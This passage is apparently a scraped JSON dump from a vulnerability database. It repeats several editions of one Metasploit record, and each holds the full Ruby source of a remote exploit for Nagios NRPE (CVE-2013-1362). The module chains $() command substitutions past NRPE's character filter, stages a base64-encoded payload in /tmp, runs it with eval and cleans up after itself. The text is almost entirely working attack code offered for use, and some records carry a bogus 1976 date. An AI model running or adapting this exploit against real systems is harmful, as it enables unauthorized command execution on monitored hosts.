When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-15T12:22:48", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-15T12:22:48", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-15T12:22:48", "differentElements": ["modified", "published"], "edition": 65}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-17T20:29:16", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-17T20:29:16", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-17T20:29:16", "differentElements": ["modified", "published"], "edition": 66}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-17T22:29:12", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-17T22:29:12", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-17T22:29:12", "differentElements": ["modified", "published"], "edition": 67}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-21T16:35:56", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-17T22:29:12", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-21T16:35:56", "differentElements": ["modified", "published"], "edition": 68}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-21T22:33:47", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's 